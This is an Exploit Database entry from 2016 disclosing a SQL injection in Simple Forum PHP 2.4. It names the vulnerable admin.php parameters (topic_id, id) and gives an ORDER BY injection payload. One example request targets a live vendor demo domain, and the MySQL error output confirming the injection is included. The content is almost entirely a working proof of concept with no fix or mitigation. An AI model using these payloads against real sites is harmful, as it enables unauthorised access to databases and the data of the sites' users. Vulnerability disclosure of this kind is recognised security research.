Simple Forum PHP 2.4 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Ehsan Hosseini
  日期： 2016-10-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40531/

• =====================================================
  # Simple Forum PHP 2.4 - SQL Injection
  =====================================================
  # Vendor Homepage: http://simpleforumphp.com
  # Date: 14 Oct 2016
  # Demo Link : http://simpleforumphp.com/forum/admin.php
  # Version : 2.4
  # Platform : WebApp - PHP
  # Author: Ashiyane Digital Security Team
  # Contact: hehsan979@gmail.com
  =====================================================
  # PoC:
  Vulnerable Url:
  http://localhost/forum/admin.php?act=replies&topic_id=[payload]
  http://localhost/forum/admin.php?act=editTopic&id=[payload]
  Vulnerable parameter : topic_id , id
  Mehod : GET
  
  A simple inject :
  Payload : '+order+by+100--+
  http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
  
  In response can see result :
  Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
  id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
  
  Result of payload: Error: Unknown column '100' in 'order clause'
  =====================================================
  # Discovered By : Ehsan Hosseini
  =====================================================